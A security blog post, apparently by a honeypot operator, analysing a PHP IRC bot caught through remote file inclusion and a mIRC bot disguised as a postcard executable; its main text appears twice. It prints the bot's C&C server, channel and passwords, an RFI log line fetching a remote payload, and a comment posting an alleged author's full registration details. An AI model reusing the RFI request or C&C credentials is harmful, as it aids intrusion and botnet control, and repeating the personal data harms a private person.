PBot a PHP Bot found in Honeypots RFIs
While going through a couple dozen newer RFI's, I found a suspect file that turned out to be more than the usual RFI.
I thought some of my readers would like more information on this one. The file was called pbot.txt, and was downloaded from a server in Taiwan.
This file turns out to be a decently coded PHP Bot which connects to an IRC C&C. The IRC Server is located at irc.indoirc.net - which hosts a handful of smaller botnets, but also appears to be somewhat legitimate.
The bot joins a C&C channel, in this case #AnakDompu, and waits for commands. This version of the bot allows for UDP and TCP flooding, and a connect back shell. The shell is written in perl and is commonly found in many perl bots and newbie hacker kits. Google searches for dc.pl will turn up many examples.
The bot contains the dc.pl perl script in base64 encoded text. Since webservers commonly run in datacenters with a good deal of bandwidth, the TCP and UDP flooding capabilities are more generally more successful than the those on a home machine with limited upload speed.
I couple thousand of these bots could easily compare to 30 or 40 thousand dsl/cable user bots. Lucky for us, there are only 36 bots connected at this time.
I'm sure the bot author is still wondering why his commands aren't working on my snoopbot. He hasn't kicked/banned the fake bot, and continues to issue commands that just don't work.
Normally I have to work to strip out the C&C information out of the bots. These guys made it easier on me...
Most of the standard IRC IDS Signatures will work in this case.
Note: Monitoring bots should always be done with the consent of your ISP. I have permission from my ISP's to perform these monitoring activities and to run Honeypots. As they say, don't try this at home.
For those who know what their doing, and are authorized by their ISP's to do so, my honeypot log entry is provided below.
89.218.85.18 - - [01/Jan/2009:14:18:37 -0500] "GET --VULNERABILITY REDACTED--=http:// c-a-k-e-p.co.cc /adu /pbots.txt??? HTTP/1.1" 200 2324 - "-" "libwww-perl/5.805" "-"
Note, the 200 status code is a feature of my honeypot - it returns 200 for all pages, found or not. I added the spaces above to keep from accidental clicks.
I removed the vulnerable page information, because I don't think its helpful to give that level of detail.
--- Another IRC bot:
This little jewel comes from our mailbag. It was included as a binary, no source host for infection.
The file, postcard.exe is actually a RAR compressed SFX archive. When run, a RAR script that calls
a batch file is launched. The batch file opens a mountain scene picture entitled xmas.jpg.
It also runs a copy of MIRC and places that same binary in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
It uses a likely stolen/generated MIRC license ending with 6732.
It installs itself in C:\Windows\temp\spoolsv\spoolsv.exe - which would be okay, except for that directory
isn't writable on my system as a normal user. That and the location of the run key means it will only infect
those who run with administrator rights.
MIRC Bots are scripted by those not experienced. Those that connect to public IRC servers like UnderNET prove
the authors inexperience.
This one joins the channel #romania on Undernet. I'm sure the IRCOps will be on it before too long, if they
actually have any hosts - I didn't bother to check.
I thought some of my readers would like more information on this one. The file was called pbot.txt, and was downloaded from a server in Taiwan.
This file turns out to be a decently coded PHP Bot which connects to an IRC C&C. The IRC Server is located at irc.indoirc.net - which hosts a handful of smaller botnets, but also appears to be somewhat legitimate.
The bot joins a C&C channel, in this case #AnakDompu, and waits for commands. This version of the bot allows for UDP and TCP flooding, and a connect back shell. The shell is written in perl and is commonly found in many perl bots and newbie hacker kits. Google searches for dc.pl will turn up many examples.
The bot contains the dc.pl perl script in base64 encoded text. Since webservers commonly run in datacenters with a good deal of bandwidth, the TCP and UDP flooding capabilities are more generally more successful than the those on a home machine with limited upload speed.
I couple thousand of these bots could easily compare to 30 or 40 thousand dsl/cable user bots. Lucky for us, there are only 36 bots connected at this time.
I'm sure the bot author is still wondering why his commands aren't working on my snoopbot. He hasn't kicked/banned the fake bot, and continues to issue commands that just don't work.
Normally I have to work to strip out the C&C information out of the bots. These guys made it easier on me...
"server"=>"irc.indoirc.net",
"port"=>"6667",
"pass"=>"Walau.Jelek.Tetap.Bilang.Cakep.La",
"prefix"=>"ManieZ",
"maxrand"=>8,
"chan"=>"#AnakDompu",
"chan2"=>"#AnakDompu",
"key"=>"",
"modes"=>"+iBx",
"password"=>"AnakDompu",
"trigger"=>"~",
"hostauth"=>"Orang.Cakep.Tetap.Bilang.C-a-K-e-P.Co.Cc" // * for any hostname
Most of the standard IRC IDS Signatures will work in this case.
Note: Monitoring bots should always be done with the consent of your ISP. I have permission from my ISP's to perform these monitoring activities and to run Honeypots. As they say, don't try this at home.
For those who know what their doing, and are authorized by their ISP's to do so, my honeypot log entry is provided below.
89.218.85.18 - - [01/Jan/2009:14:18:37 -0500] "GET --VULNERABILITY REDACTED--=http:// c-a-k-e-p.co.cc /adu /pbots.txt??? HTTP/1.1" 200 2324 - "-" "libwww-perl/5.805" "-"
Note, the 200 status code is a feature of my honeypot - it returns 200 for all pages, found or not. I added the spaces above to keep from accidental clicks.
I removed the vulnerable page information, because I don't think its helpful to give that level of detail.
--- Another IRC bot:
A postcard? -- Nah.. A MIRC bot.
This little jewel comes from our mailbag. It was included as a binary, no source host for infection.
The file, postcard.exe is actually a RAR compressed SFX archive. When run, a RAR script that calls
a batch file is launched. The batch file opens a mountain scene picture entitled xmas.jpg.
It also runs a copy of MIRC and places that same binary in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
It uses a likely stolen/generated MIRC license ending with 6732.
It installs itself in C:\Windows\temp\spoolsv\spoolsv.exe - which would be okay, except for that directory
isn't writable on my system as a normal user. That and the location of the run key means it will only infect
those who run with administrator rights.
MIRC Bots are scripted by those not experienced. Those that connect to public IRC servers like UnderNET prove
the authors inexperience.
This one joins the channel #romania on Undernet. I'm sure the IRCOps will be on it before too long, if they
actually have any hosts - I didn't bother to check.
Labels: Botnet monitoring, Botnets, C and C, Honeypots, PHPBot, RFI
posted by Nicholas at
23:42
1 Comments:
Have a look at:
http://bl4ckb0t.biz/?p=112 - this guy is one of the regulars of the IRC network you've mentioned.
That IRC network also houses an Indonesian hacking group (cannot remember the name). They have a bot than scans hosts for SQL injection vulnerabilities.
They probably wouldnt be that hard to track down (see below whois information of bl4ckb0t.biz)
Domain Name BL4CKB0T.BIZ
Domain ID D27915184-BIZ
Sponsoring Registrar ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID 82
Domain Status clientTransferProhibited
Registrant ID OLN137430280
Registrant Name Abhie Ganteng
Registrant Organization Abhie Ganteng
Registrant Address1 Jln. Parakang Street 666
Registrant City Macazzart City
Registrant State/Province Sulawesi Selatan Sulawesi Selatan
Registrant Postal Code 90233
Registrant Country Indonesia
Registrant Country Code ID
Registrant Phone Number +62.8124107863
Registrant Facsimile Number +62.8124107863
Registrant Email 0wn3d@indohackerlink.com
Administrative Contact ID OLN137430281
Administrative Contact Name Abhie Ganteng
Administrative Contact Organization Abhie Ganteng
Administrative Contact Address1 Jln. Parakang Street 666
Administrative Contact City Macazzart City
Administrative Contact State/Province Sulawesi Selatan Sulawesi Selatan
Administrative Contact Postal Code 90233
Administrative Contact Country Indonesia
Administrative Contact Country Code ID
Administrative Contact Phone Number +62.8124107863
Administrative Contact Facsimile Number +62.8124107863
Administrative Contact Email 0wn3d@indohackerlink.com
Billing Contact ID OLN137430285
Billing Contact Name Abhie Ganteng
Billing Contact Organization Abhie Ganteng
Billing Contact Address1 Jln. Parakang Street 666
Billing Contact City Macazzart City
Billing Contact State/Province Sulawesi Selatan Sulawesi Selatan
Billing Contact Postal Code 90233
Billing Contact Country Indonesia
Billing Contact Country Code ID
Billing Contact Phone Number +62.8124107863
Billing Contact Facsimile Number +62.8124107863
Billing Contact Email 0wn3d@indohackerlink.com
Technical Contact ID OLN137430282
Technical Contact Name Abhie Ganteng
Technical Contact Organization Abhie Ganteng
Technical Contact Address1 Jln. Parakang Street 666
Technical Contact City Macazzart City
Technical Contact State/Province Sulawesi Selatan Sulawesi Selatan
Technical Contact Postal Code 90233
Technical Contact Country Indonesia
Technical Contact Country Code ID
Technical Contact Phone Number +62.8124107863
Technical Contact Facsimile Number +62.8124107863
Technical Contact Email 0wn3d@indohackerlink.com
Name Server NS1.EVERYDNS.NET
Name Server NS2.EVERYDNS.NET
Created by Registrar ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Last Updated by Registrar ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Registration Date Wed Oct 29 07:35:21 GMT 2008
Domain Expiration Date Wed Oct 28 23:59:59 GMT 2009
Domain Last Updated Date Tue Dec 23 23:19:36 GMT 2008
He also seems to have the following email addresses and domains registered:
#
"bl4ck3n91n3@Phreaker.net";
#
"punkhackerboy@gmail.com";
#
"bl4ck_3n91n3@hackermail.com";
#
"qalby_08@yahoo.co.id";
#
Muh. Nur Alim Qalby
#
http://bl4ckb0t.biz -
#
http://bl4ckb0t.net -
#
http://bl4ckb0t.com -
#
http://fuckserv.net
Post a Comment
<< Home